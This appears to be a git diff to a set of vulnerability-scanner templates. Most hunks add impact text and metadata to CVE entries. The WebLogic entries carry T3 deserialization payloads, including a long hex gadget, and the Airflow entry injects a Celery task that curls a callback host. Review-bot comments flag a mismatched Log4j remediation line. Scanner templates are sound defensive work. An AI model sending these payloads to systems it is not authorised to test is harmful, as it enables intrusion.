https://medium.com/@katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817 - https://nvd.nist.gov/vuln/detail/CVE-2023-39600 
@@ -15,13 +17,13 @@ info: cve-id: CVE-2023-39600 cwe-id: CWE-79 epss-score: 0.0046 - cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* epss-percentile: 0.72232 + cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"icewarp" vendor: icewarp product: icewarp_server + shodan-query: title:"icewarp" tags: cve,cve2023,icewarp,xss http: diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index 750c89c505..9895223289 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -6,12 +6,14 @@ info: severity: medium description: | Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential theft of sensitive information, session hijacking, or defacement. reference: - https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/ metadata: + verified: "true" max-request: 1 shodan-query: html:"fieldpopupnewsletter" - verified: "true" tags: cve,cve2023,prestashop,xss http: diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index 901b769e1d..7f817bbf5e 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -6,13 +6,15 @@ info: severity: low description: | PrestaShop modules by MyPrestaModules expose PHPInfo + impact: | + An attacker can exploit this vulnerability to obtain sensitive information about the server configuration, potentially leading to further attacks. reference: - https://blog.sorcery.ie/posts/myprestamodules_phpinfo/ - https://cve.report/CVE-2023-39677 metadata: + verified: true max-request: 2 shodan-query: http.component:"PrestaShop" - verified: true tags: cve,cve2023,prestashop,phpinfo,disclosure http: 
diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index 045b97d614..96cca80061 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest patch or upgrade to a newer version of mooSocial to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 93703388d3..256ac3cb97 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of mooSocial or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index fe677be73f..1f70edddd8 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml 
@@ -5,6 +5,8 @@ info: author: iamnoooob,rootxharsh,pdresearch severity: critical description: Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. reference: - https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g - https://blog.calif.io/p/craftcms-rce @@ -19,10 +21,10 @@ info: epss-score: 0.00044 epss-percentile: 0.08209 metadata: - max-request: 1 verified: true - publicwww-query: "craftcms" + max-request: 1 shodan-query: http.favicon.hash:-47932290 + publicwww-query: "craftcms" tags: cve,cve2023,rce,unauth,craftcms http: diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index 6ab536c1cd..352be9f4fc 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml 
@@ -6,12 +6,14 @@ info: severity: high description: | JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`). + impact: | + The vulnerability allows an attacker to gain sensitive information from the JumpServer application. reference: - https://github.com/jumpserver/jumpserver/blob/v3.6.1/apps/terminal/api/session/session.py#L91 - https://nvd.nist.gov/vuln/detail/CVE-2023-42442 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="JumpServer" tags: cve,cve2023,jumpserver,exposure diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index bd01f96b1e..c2b7520923 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-4568 - https://www.tenable.com/security/research/tra-2023-31 
diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 0ac4ef7924..2fb9906d01 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to local files. remediation: Fixed in version 3.09 reference: - https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/ diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml index 2122d9fd39..79cfcd2d55 100644 --- a/http/cves/2023/CVE-2023-4714.yaml +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -5,7 +5,9 @@ info: author: Farish severity: high description: | - A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely. + A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-4714 - https://www.exploitalert.com/view-details.html?id=39826 @@ -14,8 +16,8 @@ info: cvss-score: 7.5 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: cve,cve2023,playtube,exposure http: diff --git a/network/cves/2011/CVE-2011-2523.yaml b/network/cves/2011/CVE-2011-2523.yaml index a1c22ab8ce..eaecc8b8c0 100644 --- a/network/cves/2011/CVE-2011-2523.yaml 
+++ b/network/cves/2011/CVE-2011-2523.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the FTP server. remediation: | Update to the latest version of VSFTPD, which does not contain the backdoor. reference: diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml index fe810d10ef..7211249079 100644 --- a/network/cves/2015/CVE-2015-3306.yaml +++ b/network/cves/2015/CVE-2015-3306.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code with the privileges of the ProFTPd process. remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later. reference: - https://github.com/t0kx/exploit-CVE-2015-3306 diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml index cf73fce93f..e63814d001 100644 --- a/network/cves/2016/CVE-2016-2004.yaml +++ b/network/cves/2016/CVE-2016-2004.yaml 
@@ -5,6 +5,8 @@ info: author: pussycat0x severity: critical description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands with the privileges of the Data Protector service account. remediation: | Upgrade to the most recent version of HP Data Protector. reference: diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index 6766b764df..89e693b6e6 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml 
@@ -6,36 +6,45 @@ info: severity: critical description: | Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586. - reference: - - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016. + reference: + - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-3510 cwe-id: CWE-119 - epss-score: 0.0162000000 + epss-score: 0.0162 metadata: - max-request: 2 verified: true + max-request: 2 tags: cve,cve2016,weblogic,t3,rce,oast,deserialization,network - variables: start: "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" end: "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" - tcp: - inputs: - - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" - read: 1024 - - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}" + - data: "t3 12.2.1 + AS:255 + + HL:19 + + MS:10000000 + + PU:t3://us-l-breens:7001 + + \n" + read: 1024 + + - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}" host: - "{{Hostname}}" - "{{Host}}:7001" read-size: 4 - matchers: - type: word part: interactsh_protocol diff --git a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml index 1c75e515f5..84d6965bbd 100644 --- a/network/cves/2017/CVE-2017-3881.yaml 
+++ b/network/cves/2017/CVE-2017-3881.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access. reference: - https://github.com/artkond/cisco-rce diff --git a/network/cves/2017/CVE-2017-5645.yaml b/network/cves/2017/CVE-2017-5645.yaml index 120bcc3720..f7a531a96e 100644 --- a/network/cves/2017/CVE-2017-5645.yaml 
+++ b/network/cves/2017/CVE-2017-5645.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. + impact: | + Successful exploitation of this vulnerability could allow remote attackers to execute arbitrary commands on the affected server. remediation: | Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups. reference: diff --git a/network/cves/2018/CVE-2018-2628.yaml b/network/cves/2018/CVE-2018-2628.yaml index a02bc3a0b0..2e5819dfca 100644 --- a/network/cves/2018/CVE-2018-2628.yaml +++ b/network/cves/2018/CVE-2018-2628.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contains an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. + impact: | + Successful exploitation of this vulnerability can lead to arbitrary code execution with the privileges of the WebLogic server, potentially compromising the entire system. remediation: Install the suitable patch as per the Oracle Critical Patch Update advisory reference: - https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml index 77cd966683..7381a48144 100644 --- a/network/cves/2018/CVE-2018-2893.yaml +++ b/network/cves/2018/CVE-2018-2893.yaml 
@@ -6,40 +6,51 @@ info: severity: critical description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: Install the suitable patch as per the Oracle Critical Patch Update advisory reference: - https://www.anquanke.com/post/id/152164 - https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL - https://nvd.nist.gov/vuln/detail/CVE-2018-2893 - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html - remediation: Install the suitable patch as per the Oracle Critical Patch Update advisory classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-2893 - epss-score: 0.973460000 + epss-score: 0.97346 metadata: max-request: 2 tags: cve,cve2018,weblogic,network,deserialization,rce,oracle - tcp: - inputs: + - data: "t3 12.2.1 - - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + AS:255 + + HL:19 + + MS:10000000 + + PU:t3://us-l-breens:7001 + + \n" read: 1024 + - data: "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" type: hex read: 1024 - - data: "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" - type: hex - read: 1024 + - data: 
"0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f72124
85a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff" type: hex read: 1024 + - data: "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" + type: hex + read: 1024 host: - "{{Hostname}}" - "{{Host}}:7001" - matchers: - type: word part: raw diff --git a/network/cves/2020/CVE-2020-11981.yaml b/network/cves/2020/CVE-2020-11981.yaml index 9144c138b2..03e994c544 100644 --- a/network/cves/2020/CVE-2020-11981.yaml +++ b/network/cves/2020/CVE-2020-11981.yaml 
@@ -6,31 +6,45 @@ info: severity: critical description: | An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. + remediation: Upgrade apache-airflow to version 1.10.11 or higher. reference: - https://github.com/apache/airflow/pull/9178 - https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981 - remediation: Upgrade apache-airflow to version 1.10.11 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-11981 cwe-id: CWE-78 - epss-score: 0.936930000 + epss-score: 0.93693 metadata: + verified: true max-request: 2 shodan-query: product:"redis" - verified: true tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive - variables: - data: "*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$936\r\n{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"" + data: "*3\r + + $5\r + + LPUSH\r + + $7\r + + 
default\r + + $936\r + + {\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"" encode1: '[[["curl", "http://' encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]' end: '"}' - tcp: - inputs: - - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r\n')}}" + - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r + + ')}}" read: 1024 host: - "{{Hostname}}" diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml index 045b9a321a..443c1ee2a9 100644 --- a/network/cves/2020/CVE-2020-1938.yaml +++ b/network/cves/2020/CVE-2020-1938.yaml 
@@ -5,6 +5,8 @@ info: author: milo2012 severity: critical description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. + impact: | + This vulnerability can lead to unauthorized access to sensitive information, such as configuration files, source code, or credentials. 
remediation: https://access.redhat.com/solutions/4851251 reference: - https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487 diff --git a/network/cves/2020/CVE-2020-7247.yaml b/network/cves/2020/CVE-2020-7247.yaml index 96bff3c7f6..cc49c223ce 100644 --- a/network/cves/2020/CVE-2020-7247.yaml +++ b/network/cves/2020/CVE-2020-7247.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code with the privileges of the OpenSMTPD process, potentially leading to a complete compromise of the affected system. remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6 reference: - https://www.openwall.com/lists/oss-security/2020/01/28/3 diff --git a/network/cves/2021/CVE-2021-44521.yaml b/network/cves/2021/CVE-2021-44521.yaml index 6bdae518ae..72c761c099 100644 --- a/network/cves/2021/CVE-2021-44521.yaml +++ b/network/cves/2021/CVE-2021-44521.yaml 
@@ -5,6 +5,8 @@ info: author: Y4er severity: critical description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.' + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code with the privileges of the Cassandra process, potentially leading to a complete compromise of the affected system. remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2 reference: - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/ diff --git a/network/cves/2022/CVE-2022-0543.yaml b/network/cves/2022/CVE-2022-0543.yaml index 96b18d66b1..3cb5425da5 100644 --- a/network/cves/2022/CVE-2022-0543.yaml +++ b/network/cves/2022/CVE-2022-0543.yaml @@ -9,6 +9,8 @@ info: vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and compromise of the affected system. remediation: Update to the most recent versions currently available. reference: - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml index 7d05c564ec..c2602df65a 100644 --- a/network/cves/2022/CVE-2022-24706.yaml +++ b/network/cves/2022/CVE-2022-24706.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system. remediation: | Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value. reference: diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml index 8c4b279082..3886e63400 100644 --- a/network/cves/2022/CVE-2022-31793.yaml +++ b/network/cves/2022/CVE-2022-31793.yaml @@ -6,6 +6,8 @@ info: severity: high description: | muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the system. remediation: Update the application to version 1.10 reference: - https://derekabdine.com/blog/2022-arris-advisory.html diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml index 51c2a56a98..ec7b896b13 100644 --- a/network/cves/2023/CVE-2023-33246.yaml +++ b/network/cves/2023/CVE-2023-33246.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x . + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Update the RocketMQ application to version 5.1.1 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-33246
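Review bot: In the CVE-2017-3881 hunk the new `impact:` drops the device reload (denial of service) that the description names alongside code execution, and the unchanged `remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access.` reads awkwardly. Since the block is being edited anyway, suggest `impact: | Successful exploitation could allow an unauthenticated remote attacker to execute arbitrary code with elevated privileges or force a reload of the device.` and `remediation: Disable Telnet on the device (manage it over SSH) or restrict Telnet access with ACLs.`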
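Review bot: In the CVE-2017-5645 hunk the unchanged `remediation:` line is for a different bug: it tells users to update to Log4j 2.15.0 and disable JNDI lookups, which is the Log4Shell mitigation, while the description says this issue is deserialization in the TCP/UDP socket server and is fixed in 2.8.2. Since the hunk touches this block, fix it now, e.g. `remediation: Upgrade to Log4j 2.8.2 or later, and do not expose the Log4j TCP/UDP socket server to untrusted networks.`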
